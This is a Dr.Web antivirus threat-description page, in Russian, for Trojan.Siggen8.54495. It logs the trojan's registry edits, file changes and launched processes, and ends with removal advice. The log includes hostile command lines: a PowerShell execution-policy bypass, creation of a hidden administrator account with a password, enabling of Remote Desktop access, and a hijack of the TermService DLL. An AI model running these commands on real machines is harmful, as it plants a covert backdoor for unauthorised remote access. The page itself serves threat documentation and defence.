Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Siggen8.54495
Добавлен в вирусную базу Dr.Web:
2019-11-09
Описание добавлено:
2019-11-11
Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\startup\desktop.ini
Создает следующие сервисы
[<HKLM>\system\currentcontrolset\services\TermService\parameters] 'ServiceDLL' = '%ProgramFiles%\windows mail\appcache.xml'
[<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
Изменяет следующие исполняемые системные файлы
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует отображение:
скрытых файлов
расширений файлов
Изменяет следующие настройки браузера Windows Internet Explorer
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnOnPost' = '{01,00,00,00}'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'DisplayName' = 'Internet'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'PMDisplayName' = 'Internet [Protected Mode]'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'Description' = 'This zone contains all Web sites you haven't...
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'Icon' = 'inetcpl.cpl#001313'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'LowIcon' = 'inetcpl.cpl#005425'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'CurrentLevel' = '00011500'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'Flags' = '00000001'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '' = ''
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'DisplayName' = 'Restricted sites'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'PMDisplayName' = 'Restricted sites [Protected Mode]'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'Description' = 'This zone contains Web sites that could pote...
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'Icon' = 'inetcpl.cpl#00004481'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'CurrentLevel' = '00000000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'LowIcon' = 'inetcpl.cpl#005426'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'Flags' = '00000003'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] '1200' = '00000000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '1200' = '00000000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] '1200' = '00000000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1200' = '00000000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1200' = '00000003'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] '1400' = '00000000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '1400' = '00000000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] '1400' = '00000000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1400' = '00000000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '2500' = '00000003'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'DisplayName' = 'Computer'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'Flags' = '00000047'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '' = ''
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'CurrentLevel' = '00011000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'LowIcon' = 'inetcpl.cpl#005424'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'Icon' = 'inetcpl.cpl#00004480'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1C00' = '00000000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '{AEBA21FA-782A-4A90-978D-B72164C80120}' = '{1a,37,61,59,23,5...
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1A10' = '00000001'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '{A8A88C49-5EB2-4990-A1A2-0876022C854F}' = '{1a,37,61,59,23,5...
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '{AEBA21FA-782A-4A90-978D-B72164C80120}' = '{1a,37,61,59,23,5...
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1A10' = '00000003'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '{A8A88C49-5EB2-4990-A1A2-0876022C854F}' = '{1a,37,61,59,23,5...
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] '' = ''
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'DisplayName' = 'My Computer'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'PMDisplayName' = 'My Computer [Protected Mode]'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'Description' = 'Your computer'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'Icon' = 'shell32.dll#0016'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'PMDisplayName' = 'Computer [Protected Mode]'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'CurrentLevel' = '00012000'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'LowIcon' = 'inetcpl.cpl#005422'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '' = ''
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'DisplayName' = 'Local intranet'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'PMDisplayName' = 'Local intranet [Protected Mode]'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'Description' = 'This zone contains all Web sites that are on...
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'Icon' = 'shell32.dll#0018'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'LowIcon' = 'inetcpl.cpl#005423'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'CurrentLevel' = '00010500'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'Flags' = '00000143'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] '' = ''
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'DisplayName' = 'Trusted sites'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'PMDisplayName' = 'Trusted sites [Protected Mode]'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'Description' = 'This zone contains Web sites that you trust ...
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1400' = '00000003'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'Flags' = '00000021'
[\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnonZoneCrossing' = '00000000'
Без разрешения пользователя устанавливает новую стартовую страницу для Windows Internet Explorer.
Изменения в файловой системе
Создает следующие файлы
Присваивает атрибут 'скрытый' для следующих файлов
C:\users\wgautilacc\ntuser.dat
C:\users\wgautilacc\links\desktop.ini
C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\administrative tools\desktop.ini
C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\startup\desktop.ini
C:\users\wgautilacc\downloads\desktop.ini
C:\users\wgautilacc\searches\desktop.ini
C:\users\wgautilacc\appdata\roaming\microsoft\windows\recent\desktop.ini
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\desktop.ini
C:\users\wgautilacc\documents\desktop.ini
C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\desktop.ini
C:\users\wgautilacc\music\desktop.ini
C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\desktop.ini
C:\users\wgautilacc\favorites\desktop.ini
C:\users\wgautilacc\desktop\desktop.ini
C:\users\wgautilacc\pictures\desktop.ini
C:\users\wgautilacc\videos\desktop.ini
C:\users\wgautilacc\contacts\desktop.ini
D:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1006\desktop.ini
C:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1006\desktop.ini
C:\users\wgautilacc\appdata\local\microsoft\windows\usrclass.dat
C:\users\wgautilacc\saved games\desktop.ini
C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\desktop.ini
Удаляет следующие файлы
%TEMP%\nsv18cd.tmp\blowfish.dll
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\videos.library-ms~rf14aff5.tmp
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\music.library-ms~rf14afd6.tmp
C:\users\wgautilacc\appdata\local\microsoft\media player\localmls_3.wmdb
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\music.library-ms~rf1479a3.tmp
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\videos.library-ms~rf147984.tmp
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\pictures.library-ms~rf147936.tmp
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\documents.library-ms~rf1478d8.tmp
C:\users\wgautilacc\appdata\local\microsoft\windows media\12.0\wmsdknsd.xml
C:\users\wgautilacc\appdata\local\microsoft\windows media\12.0\wmsdkns.xml.bak
<SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\xpssvcs.dll
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\documents.library-ms~rf14b005.tmp
<SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\tsprint.dll
<SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\tsprint-datafile.dat
<SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\mxdwdrv.dll
C:\users\wgautilacc\appdata\local\temp\rgi19f4.tmp
C:\users\wgautilacc\appdata\local\temp\rgi18f9.tmp
C:\users\wgautilacc\appdata\local\temp\rgi18d9.tmp
C:\users\wgautilacc\appdata\local\temp\rgi1899.tmp
C:\users\wgautilacc\appdata\local\temp\rgi183a.tmp
C:\users\wgautilacc\appdata\local\temp\rgi17fb.tmp
%TEMP%\chadshfsd323.txt
%TEMP%\nsv18cd.tmp\system.dll
<SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\tsprint-pipelineconfig.xml
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\pictures.library-ms~rf14b014.tmp
Перемещает следующие файлы
<SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\set3873.tmp в <SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\tsprint.dll
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\videos.library-ms в C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\videos.library-ms~rf14aff5.tmp
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\music.library-ms в C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\music.library-ms~rf14afd6.tmp
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\music.library-ms в C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\music.library-ms~rf1479a3.tmp
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\videos.library-ms в C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\videos.library-ms~rf147984.tmp
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\pictures.library-ms в C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\pictures.library-ms~rf147936.tmp
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\documents.library-ms в C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\documents.library-ms~rf1478d8.tmp
C:\users\wgautilacc\appdata\local\microsoft\windows mail\edb.log в C:\users\wgautilacc\appdata\local\microsoft\windows mail\edb00001.log
C:\users\wgautilacc\appdata\local\microsoft\windows mail\edbtmp.log в C:\users\wgautilacc\appdata\local\microsoft\windows mail\edb.log
<SYSTEM32>\spool\drivers\x64\3\new\tsprint-pipelineconfig.xml в <SYSTEM32>\spool\drivers\x64\3\tsprint-pipelineconfig.xml
<SYSTEM32>\spool\drivers\x64\3\new\tsprint-datafile.dat в <SYSTEM32>\spool\drivers\x64\3\tsprint-datafile.dat
<SYSTEM32>\spool\drivers\x64\3\new\tsprint.dll в <SYSTEM32>\spool\drivers\x64\3\tsprint.dll
<SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\set3914.tmp в <SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\xpssvcs.dll
<SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\set38e4.tmp в <SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\mxdwdrv.dll
<SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\set38a4.tmp в <SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\tsprint-datafile.dat
<SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\set3894.tmp в <SYSTEM32>\spool\drivers\x64\{f7fc9b1d-0af8-4179-b55f-fe502906d873}\tsprint-pipelineconfig.xml
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\documents.library-ms в C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\documents.library-ms~rf14b005.tmp
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\pictures.library-ms в C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\pictures.library-ms~rf14b014.tmp
Подменяет следующие файлы
C:\users\wgautilacc\appdata\local\microsoft\windows mail\edbtmp.log
C:\users\wgautilacc\appdata\local\microsoft\windows mail\edb.log
C:\users\wgautilacc\appdata\local\microsoft\windows media\12.0\wmsdkns.xml.bak
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\documents.library-ms
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\pictures.library-ms
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\videos.library-ms
C:\users\wgautilacc\appdata\roaming\microsoft\windows\libraries\music.library-ms
Самоудаляется.
Другое
Ищет следующие окна
ClassName: 'CicLoaderWndClass' WindowName: ''
ClassName: 'Progman' WindowName: ''
ClassName: 'Proxy Desktop' WindowName: ''
ClassName: 'PersonalizationThemeChangeListener' WindowName: ''
ClassName: 'SystemTray_Main' WindowName: ''
ClassName: 'OutlookExpressHiddenWindow' WindowName: ''
Создает и запускает на исполнение
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -f %TEMP%\premiumlegitXYTDWBFWNQ.ps1
'<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\premiumlegitXYTDWBFWNQ.ps1' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc Ghar4f5 /del' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc xZRMHm7o /add' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" seexxsprk$ /ADD' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc xZRMHm7o' (со скрытым окном)
'<SYSTEM32>\userinit.exe' ' (со скрытым окном)
'%WINDIR%\syswow64\rundll32.exe' advpack.dll,LaunchINFSectionEx <SYSTEM32>\ieuinit.inf,Install,,36' (со скрытым окном)
'<SYSTEM32>\rundll32.exe' advpack.dll,LaunchINFSectionEx <SYSTEM32>\ieuinit.inf,Install,,36' (со скрытым окном)
Запускает на исполнение
'<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\premiumlegitXYTDWBFWNQ.ps1
'<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" seexxsprk$ /ADD
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
'<SYSTEM32>\net.exe' LOCALGROUP "Administrators" wgautilacc /ADD
'<SYSTEM32>\net1.exe' LOCALGROUP "Administrators" wgautilacc /ADD
'<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc xZRMHm7o
'<SYSTEM32>\net.exe' user wgautilacc xZRMHm7o
'<SYSTEM32>\net1.exe' user wgautilacc xZRMHm7o
'<SYSTEM32>\smss.exe' 00000000 0000003c
'<SYSTEM32>\csrss.exe' ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitializa...
'<SYSTEM32>\winlogon.exe'
'<SYSTEM32>\rdpclip.exe'
'<SYSTEM32>\userinit.exe'
'<SYSTEM32>\cmd.exe' /c del %temp%\*.txt /f
'<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" seexxsprk$ /ADD
'%WINDIR%\explorer.exe'
'%WINDIR%\syswow64\rundll32.exe' advpack.dll,LaunchINFSectionEx <SYSTEM32>\ieuinit.inf,Install,,36
'<SYSTEM32>\regsvr32.exe' /s /n /i:/UserInstall <SYSTEM32>\themeui.dll
'<SYSTEM32>\rundll32.exe' uxtheme.dll,#64 %WINDIR%\resources\Themes\Aero\Aero.msstyles?NormalColor?NormalSize
'%ProgramFiles(x86)%\windows mail\winmail.exe' OCInstallUserConfigOE
'%ProgramFiles%\windows mail\winmail.exe' OCInstallUserConfigOE
'<SYSTEM32>\unregmp2.exe' /FirstLogon /Shortcuts /RegBrowsers /ResetMUI
'<SYSTEM32>\regsvr32.exe' /s /n /i:U shell32.dll
'%WINDIR%\syswow64\rundll32.exe' %WINDIR%\SysWOW64\mscories.dll,Install
'%ProgramFiles(x86)%\google\chrome\application\42.0.2311.135\installer\chrmstp.exe' --configure-user-settings --verbose-logging --system-level --multi-install --chrome
'%WINDIR%\syswow64\ie4uinit.exe' -UserIconConfig
'%WINDIR%\syswow64\ie4uinit.exe' -ClearIconCache
'%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\SysWOW64\iedkcs32.dll",BrandIEActiveSetup SIGNUP
'%WINDIR%\syswow64\ie4uinit.exe' -BaseSettings
'<SYSTEM32>\gpscript.exe' /RefreshSystemParam
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" seexxsprk$ /ADD
'<SYSTEM32>\cmd.exe' /c del %temp%\*.ps1 /f
'<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
'<SYSTEM32>\icacls.exe' rfxvmt.dll /inheritance:d
'<SYSTEM32>\icacls.exe' rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
'<SYSTEM32>\icacls.exe' rfxvmt.dll /remove BUILTIN\Administrators
'<SYSTEM32>\icacls.exe' rfxvmt.dll /grant BUILTIN\Administrators:RX
'<SYSTEM32>\reg.exe' ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
'<SYSTEM32>\reg.exe' add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d "%ProgramFiles%\windows mail\appcache.xml" /f
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
'<SYSTEM32>\net.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
'<SYSTEM32>\net1.exe' localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
'<SYSTEM32>\cmd.exe' /c cmd/c net start rdpdr
'<SYSTEM32>\takeown.exe' /A /F rfxvmt.dll
'<SYSTEM32>\cmd.exe' /c net start rdpdr
'<SYSTEM32>\net1.exe' start rdpdr
'<SYSTEM32>\cmd.exe' /c cmd/c net start TermService
'<SYSTEM32>\cmd.exe' /c net start TermService
'<SYSTEM32>\net.exe' start TermService
'<SYSTEM32>\net1.exe' start TermService
'<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc Ghar4f5 /del
'<SYSTEM32>\net.exe' user wgautilacc Ghar4f5 /del
'<SYSTEM32>\net1.exe' user wgautilacc Ghar4f5 /del
'<SYSTEM32>\cmd.exe' /C net.exe user wgautilacc xZRMHm7o /add
'<SYSTEM32>\net.exe' user wgautilacc xZRMHm7o /add
'<SYSTEM32>\net1.exe' user wgautilacc xZRMHm7o /add
'<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
'<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
'<SYSTEM32>\net.exe' start rdpdr
'<SYSTEM32>\ie4uinit.exe' -BaseSettings
'<SYSTEM32>\rundll32.exe' advpack.dll,LaunchINFSectionEx <SYSTEM32>\ieuinit.inf,Install,,36
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK